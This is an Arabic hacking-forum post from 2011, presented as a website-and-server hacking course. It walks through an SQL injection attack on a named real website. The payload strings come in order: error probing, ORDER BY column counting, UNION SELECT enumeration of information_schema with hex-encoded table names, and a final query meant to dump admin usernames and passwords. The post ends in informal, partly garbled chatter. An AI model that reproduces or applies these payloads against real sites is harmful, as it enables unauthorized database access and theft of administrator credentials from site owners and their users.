بسم الله الرحمن الرحيم
(( 2011 مرحبا بكم في دورة اختراق المواقع والسيرفرات))
محمد50 المقدم من طرف
|================================================= ====|
sql استغلال ثغرات
|================================================= ====|
هي الاكثر انتشار sql ثغرات
أولا هده هي الثغرة
http://packetstormsecurity.org/files...diacon-sql.txt
أنا عندي موقع مصاب
http://wtbazar.com/selloffers.php?pg=52&cid=0
الان نبدأ على بركة الله الاستغلال وسيكون على مراحل
------------------------------------------------------------
اضافة علامة "'" بعد المتغير لتأكد من اصابة الموقع
والمتغير هو الرقع الدي بعد =
لي الاسف حتى المواقع العربية مصابة
Warning: mysql_fetch_array():
نشوف موقعنا
^^ تمام الموقع مصاب
------------------------------------------------------------
order by x بعد المتغير نكتب
لكشف عدد الاعمدة في الموقع
نلاحط أن عدد سطور الاخطاء 4
أصبحو 2 عند وضع 4 أعمدة نبقى على هدا المنوال حتى نصل للعمود الاكبر التي يكون فيه 2 اخطاء
طبعا ليس دائما
العمود المصاب هو 8
------------------------------------------------------------
union select 1,2,3,4,5,6,7,8-- الان نضيف
لكشف العمود المصاب
العمود المصاب هو وقم 2
ولنتأكد أكثر
نكتب أي شئ مكان رقم 2 ادا ظهر نتأكد من اصابة العمود "طبعا في بعض الحالات فقط"
------------------------------------------------------------
versionنكتب مكان رقم2 ()
union select 1,version(),3,4,5,6,7,8--
لاظهار اصدار القاعدة
5.0.92-community
------------------------------------------------------------
"نطبق هدا الامر بعد الاعمدة"
From+information_schema.tables+where+table_schema= database()
يصبح كالتالي
union select 1,2,3,4,5,6,7,8+From+information_schema.tables+whe re+table_schema=database()
بعدها يظهر لنا أن العمود 2 مصاب 100%
------------------------------------------------------------
بعدها للاظهار محتواه نكتب الامر مكـان العمود
Group_concat(table_name)
ستظهر لنا جداول العمود نشفر كلمة الادمن بالهكس ندهب لجوجل ونبحث عن موقع تشفير نكتب
text to hex
بالتشفير الدى حصلنا عليه يصبح الرابط كالاتي database() نستبدل كلمة
union select 1,Group_concat(table_name),3,4,5,6,7,8+From+inform ation_schema.tables+where+table_schema=0x7362626c6 56164735f61646d696e
طبعا لا ننسى قبلها
0x
------------------------------------------------------------
name بـ schema نستبدل كلمة
columns بـ tables ونستبدل كلمة
column بـ table وأيضا نستبدل كلمة
فيصبح الرابط
union select 1,Group_concat(column_name),3,4,5,6,7,8+From+infor mation_schema.columns+where+table_name=0x7362626c6 56164735f61646d696e
النت ضعيف
------------------------------------------------------------
ظهر لنا محتوى الجدول
sb_id,sb_admin_name,sb_pwd
الان نستبدل الاوامر بالشكل التالي
sb_admin_name,sb_pwd بمعلومات الصفوف وهي column_name نستبدل
,0x3a, بهده العلامة sb_pwd و sb_admin_name ما ننسى نفصل بين
يصبح الرابط
union select 1,Group_concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6, 7,8+From+information_schema.columns+where+table_na me=0x7362626c656164735f61646d696e
كان من المفروض يعطنا الايميل وكلمة السر
المهم هده هي أخر خطوة
والفكرة واضحة
------------------------------------------------------------
: ملاحظة
order+by+number في بعض المواقع يقوم الموقع بعمل رديكسون مباشرة بعد اضافة
لتخلص من هدا المشكل نبقى علامة ' ثم نحقن الموقع
------------------------------------------------------------
انتهى بحمد الله
والله يا الغالين والله انا اليوم ولي الحمد الله انا بحمد الله والله يا الخوني انا والله انت علم
وهل تصدقون والله كل يوم انا تعبان من النت والله يا الغالين
على العموم والله اتمناء من الله انكم تكونون بخير ما انا تعبان من نت والله
باااااااااااااااااااي يا الغالين
باااااااااااااااااي: bye1:
avhp uk hgjprdk hgl,hru ufv 'vdri